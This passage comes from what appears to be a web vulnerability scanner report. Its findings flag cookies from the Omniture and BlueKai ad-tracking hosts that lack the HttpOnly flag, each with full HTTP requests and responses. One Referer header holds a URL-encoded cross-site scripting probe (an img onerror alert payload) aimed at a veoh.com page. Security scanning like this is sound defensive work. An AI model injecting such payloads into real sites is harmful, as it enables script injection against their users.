Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20index%20(US); s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; s_cc=true; s_sq=appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:50:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=LP i=4680124532241,d=1296755435; expires=Fri, 03-Feb-2012 17:50:35 GMT; path=/
Set-Cookie: HumanClickKEY=5241864906341434075; path=/hc/6964264
Set-Cookie: HumanClickACTIVE=1296755435605; expires=Fri, 04-Feb-2011 17:50:35 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 03 Feb 2011 17:50:35 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28560

lpConnLib.Process({"ResultSet": {"lpCallId":"660799024160-40367446374","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'storechat.apple.com
...[SNIP]...

13.201. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s01692645419389  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s01692645419389

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s01692645419389 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:32:32 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B10E0[CE]; Expires=Tue, 2 Feb 2016 20:32:32 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s01692645419389?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 20:32:32 GMT
Last-Modified: Fri, 04 Feb 2011 20:32:32 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www354
Content-Length: 0
Content-Type: text/plain
Connection: close


13.202. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s03453267652075  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s03453267652075

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s03453267652075 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:50:13 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s03453267652075?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:50:13 GMT
Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www379
Content-Length: 0
Content-Type: text/plain
Connection: close


13.203. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s04304838050156  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s04304838050156

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s04304838050156 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:50:13 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s04304838050156?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:50:13 GMT
Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www298
Content-Length: 0
Content-Type: text/plain
Connection: close


13.204. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07192756696604  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s07192756696604

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s07192756696604 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:50:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F1[CE]; Expires=Tue, 2 Feb 2016 19:50:09 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07192756696604?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:50:09 GMT
Last-Modified: Fri, 04 Feb 2011 19:50:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain
Connection: close


13.205. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s07964217748958

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s07964217748958 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:19:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4AFFAE[CE]; Expires=Tue, 2 Feb 2016 19:19:10 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:19:10 GMT
Last-Modified: Fri, 04 Feb 2011 19:19:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www262
Content-Length: 0
Content-Type: text/plain
Connection: close


13.206. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s081445949617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s081445949617

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s081445949617 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:50:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F2[CE]; Expires=Tue, 2 Feb 2016 19:50:10 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s081445949617?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:50:10 GMT
Last-Modified: Fri, 04 Feb 2011 19:50:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www384
Content-Length: 0
Content-Type: text/plain
Connection: close


13.207. http://tags.bluekai.com/site/2174  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2174

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2174 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=s/wmp1UR22QsHNJo; bkc=KJh566N/PaWDOded7x2N7OALjoWPDh9bZC9PYkjup+eYs7C2xJusVm/c+OY7BCVk/TC/jJLvtAPONAvyyWUHNtJG6uT/CsezOOWsWVlDxvpmKKd55I4zpUFXKm4MzL28dxgGMxOdUI2p/iQDILAwqhrUSTOwkTcRV+bCEtOdcJUZ4mt71SOoesCRpM+CvB4lgAF4+zp8tF4MxaVBx+r0PTI2jpIWmPbfPmF8bC4M/lcoH1ATHL8Bu92mug2dRwy0urTO8ZTzelyinLl2+52u4GEbkSXjEIIu87C+fL4Fb4GrNlwI2dUDqiKvN9ufR6obRzaTiJJZB2w1rGbbIKy7kgZK5GAKpfzODpzfbqTlb+MpkMkKK6zubs8DKaU1AodPL72Z/1pht74/o2LD1k50EQJqyO8rkmjTfUcS7tipyAT07Td2QFSg6FmVmP2fo+gpY+NcYnXstJN26k7nbEcMVjgk/53l4pXmrdURO0hp4Vtb4G0uFNUTArPK0pumy1m6nTF7Q12nOywUJbD8UprjGc2hAXvcR7FQ+uooM+zIxd4E1Qv1MOLlVIjTfqwIKDdbnFg2YtcMY8qd5OFlCnlTBbatZ7d/2VHSIksg2swn8p13Xs2ddfIsFwgLDlcoX/g6EnDvUm4w3NpC4vF62NUoNcRPsw8IerN+Yj0fJqlRG/E4jSulBAkljvVwVD84BwTw/Leb1Q==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:52:27 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 04 Feb 2011 20:52:27 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=hgA1oXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh566N/PaWDOded4EmMMMmehu00RCJYhyI/YQDgvV5GRxtXwiOvx0GoCHqiNvSi59xHiVhExqLG0aG/agQGIkG1n5GaQHY1Z0eY/vvBsDx48fplfg+pfrR24+hpf7Zzz2bx9QSMyBXUm2yGiLDCXg6qhoDbTw6a/n8VzmA/fc5M6o0FduQm+/TepuLaBynkI4RPbPrVmPdfEQvG3PwGVFcFRtdqYVsmN0fUIff66UC4xMojBGbEX8wu8bSAl2yN4CRMeyepPyIswoux8FgSg0QduFD3kTN7+AopFeqUTd51R8d7IKeX5fg5MuW20Kbjkk8zBObZon7NBnmIdPTIIbakFAIfE/X7ZTeoSflDfpXBf9UncvI2JxU6+0QXnIU/MIFjlf/x87M+ZIuMUxgjilAlixNQMfH/zfptOmNwgWtCiK0Q3jl2kwSgtQrVmP2f++qlvFUey4KpfB8E6M7nZUcMmjgkc+3l4NdlKFNCffn12t+EIpasdkpkX8Rcn51TxGdxFi059eTLfyf5ZJnZ4mNDAFfa5xoFu2tCNt3AmPffswV7RhxR7EOrLXphtLKefp6zrOEDn6S1ENFINVXXWwcMUpg5BcdcXNHsI7b729wnJf132/2QdpX8dFlL/y7o0vg6qv6vlHe13Nnkx346k8dubz63B/n2cBfKWEodUU3oVxZdpAoFqJUr0DA4LJy8Rdy45E7fPQ==; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:52:27 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.208. http://tags.bluekai.com/site/2491  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2491

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2491?ss_rand=637007605 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=hgA1oXUR22QsHNJo; bkc=KJh566N/PaWDOded4EmMMMmehu00RCJYhyI/YQDgvV5GRxtXwiOvx0GoCHqiNvSi59xHiVhExqLG0aG/agQGIkG1n5GaQHY1Z0eY/vvBsDx48fplfg+pfrR24+hpf7Zzz2bx9QSMyBXUm2yGiLDCXg6qhoDbTw6a/n8VzmA/fc5M6o0FduQm+/TepuLaBynkI4RPbPrVmPdfEQvG3PwGVFcFRtdqYVsmN0fUIff66UC4xMojBGbEX8wu8bSAl2yN4CRMeyepPyIswoux8FgSg0QduFD3kTN7+AopFeqUTd51R8d7IKeX5fg5MuW20Kbjkk8zBObZon7NBnmIdPTIIbakFAIfE/X7ZTeoSflDfpXBf9UncvI2JxU6+0QXnIU/MIFjlf/x87M+ZIuMUxgjilAlixNQMfH/zfptOmNwgWtCiK0Q3jl2kwSgtQrVmP2f++qlvFUey4KpfB8E6M7nZUcMmjgkc+3l4NdlKFNCffn12t+EIpasdkpkX8Rcn51TxGdxFi059eTLfyf5ZJnZ4mNDAFfa5xoFu2tCNt3AmPffswV7RhxR7EOrLXphtLKefp6zrOEDn6S1ENFINVXXWwcMUpg5BcdcXNHsI7b729wnJf132/2QdpX8dFlL/y7o0vg6qv6vlHe13Nnkx346k8dubz63B/n2cBfKWEodUU3oVxZdpAoFqJUr0DA4LJy8Rdy45E7fPQ==; bkdc=res

Response

HTTP/1.0 302 Moved Temporarily
Date: Thu, 03 Feb 2011 21:07:36 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Location: http://dt.scanscout.com/ssframework/dt/pt.png?trackcd=1288991585470
Set-Cookie: bk=qJ0MDVVZbt/sHNJo; expires=Tue, 02-Aug-2011 21:07:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh566N/PaWDOded7x2N7OALj+aREWnGI9aHGV9k8xy+g/7o9b/6o92vGRU1NvSA59xHiVhExqLG0aG/agQGZZGhrVQUOW/yqR//QTQtjCO27wwKrI2bfrR24gpdrKK2KITgHTeaDuejKeYF9JEJq0ywCGpcbTOyZ6nEoVyIQvjt2+1YCmz+zfltVKUbfTF+IHYvH4S2sXjP0gIfYWHVz6Td2+rYBB5gwbnlSh6eZo5pIuYDT2rM6gzLzflt7uCxDb4x+K0rh2bb9XvzNbfDrffXyUCFPeoV1RbxLhwu80KkU2XN4CRZeyOpPydTwCuP8FfSnbAIHwt3PT07+6CpUoFfXU6btK5Tp7FIm2sKe01hyKbjAk8R1ObiG+7NBnmI4DT2IbakUAIfxoz7sTsoSft6llXStwmVmSI2mxf6+0QXntU/MIFjl2/x8gptE4nHnGD67SXRBG92lYnBKKtjV+zg2e6O4edcfM6k7qszsMmKoP7LoFw0fILK8dFRm0lpI+364uixwbdhOzrekZAf4xdEFJ5m9mXdfFv5MW+pFURXHFdumGUaDg4FNHoopZL4GdIoRyxRsE5rLXh8fKwKIhftUwnbaTwso0ldbMzKYng8z3Yq8C5ywJZuF+Xodze00qE0dz1fF8XYfFgL/NcoT/g6Evl0lKeB3fgsrDfonpIkW8rDqlM7StCqCIdL5KZkjiUXvil5tYg5A8cKqpkNhFQds89Yb9==; expires=Tue, 02-Aug-2011 21:07:36 GMT; path=/; domain=.bluekai.com
